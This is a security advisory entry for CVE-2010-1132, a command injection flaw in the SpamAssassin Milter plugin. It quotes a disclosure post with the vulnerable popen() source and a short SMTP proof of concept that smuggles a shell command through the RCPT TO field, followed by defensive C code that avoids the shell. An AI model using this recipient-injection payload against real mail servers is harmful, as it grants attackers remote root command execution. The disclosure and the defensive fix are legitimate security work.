Category:   Application (Generic)  >   SpamAssassin Milter Plugin
Vendors:   Nelson, Dan, et al
SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1023691
SecurityTracker URL:  http://securitytracker.com/id/1023691
CVE Reference:   CVE-2010-1132
Updated:  Mar 31 2010
Original Entry Date:  Mar 8 2010
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes
Version(s): 0.3.1; possibly earlier versions
Description:   A vulnerability was reported in SpamAssassin Milter Plugin. A remote user can execute arbitrary code on the target system.

When the software is invoked with the expand (-x) flag, it builds a shell command string containing the unvalidated RCPT TO envelope recipient and runs it with popen(). A remote user can send a specially crafted RCPT TO value to execute arbitrary code on the target system. The code will run with the privileges of the target service.

Kingcope reported this vulnerability.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  savannah.nongnu.org/projects/spamass-milt/
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   None.


Source Message Contents

Date:  Sun, 07 Mar 2010 20:17:14 +0100
Subject:  [Full-disclosure] Spamassassin Milter Plugin Remote Root

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definitely
seeking the nice 0days!

Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option), it runs a
popen() including the attacker-supplied recipient (RCPT TO).

From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        FILE *p;
#if defined(__FreeBSD__)
        int rv;
#endif

        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)
        {
                /* open a pipe to sendmail so we can do address expansion */

                char buf[1024];
                char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
                snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
                /* XXX possible buffer overflow here // is this a joke ?! */
                sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

                debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
                rv = pthread_mutex_lock(&popen_mutex);
                if (rv)
                {
                        debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
                        abort();
                }
#endif

                p = popen(buf, "r");				[1]
                if (!p)
                {
                        debug(D_RCPT, "popen failed(%s).  Will not expand aliases", strerror(errno));
                        assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope
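Added example, not spamass-milter's code and not the project's eventual fix: the same "sendmail -bv <recipient>" expansion step done with fork + execv so the recipient is a single argv element that no shell ever parses, plus a metacharacter check a milter could apply (or log on) before expanding anything. /bin/echo is an assumed stand-in for the sendmail binary so the captured output shows exactly what the child received; the recipient string is the one from the PoC above.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
/* Defence in depth: flag recipients carrying shell metacharacters so they can
 * be rejected or logged before any expansion is attempted (1 = present). */
int rcpt_has_shell_metachars(const char *rcpt)
{
    return strpbrk(rcpt, "|&;<>`$\"'\\()\n") != NULL;
}

/* Run `prog -bv rcpt` via fork + execv instead of popen: rcpt is a single argv
 * element that /bin/sh never sees. stdout+stderr are read together (the
 * original's "2>&1"). Returns the text (static buffer, no trailing newline) or NULL. */
const char *expand_rcpt_noshell(const char *prog, const char *rcpt)
{
    static char out[512];
    int fds[2];
    if (pipe(fds) == -1) return NULL;
    pid_t pid = fork();
    if (pid == -1) { close(fds[0]); close(fds[1]); return NULL; }
    if (pid == 0) {                          /* child */
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]); close(fds[1]);
        char *const argv[] = { (char *)prog, "-bv", (char *)rcpt, NULL };
        execv(prog, argv);
        _exit(127);
    }
    close(fds[1]);                           /* parent */
    size_t n = 0; ssize_t r;
    while (n + 1 < sizeof out && (r = read(fds[0], out + n, sizeof out - 1 - n)) > 0)
        n += (size_t)r;
    out[n] = '\0';
    close(fds[0]);
    waitpid(pid, NULL, 0);
    if (n > 0 && out[n - 1] == '\n') out[--n] = '\0';
    return out;
}

int main(void)
{
    /* constructed sample: the PoC recipient; /bin/echo stands in for the
     * sendmail binary (assumption) so the output shows what the child got */
    const char *rcpt = "root+:\"|touch /tmp/foo\"";
    const char *seen = expand_rcpt_noshell("/bin/echo", rcpt);
    printf("metachars=%d, child received: %s\n",
           rcpt_has_shell_metachars(rcpt), seen ? seen : "(failed)");
    return 0;
}
```

With the shell removed the child prints the recipient literally, pipe character and quotes included, instead of running the embedded command.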
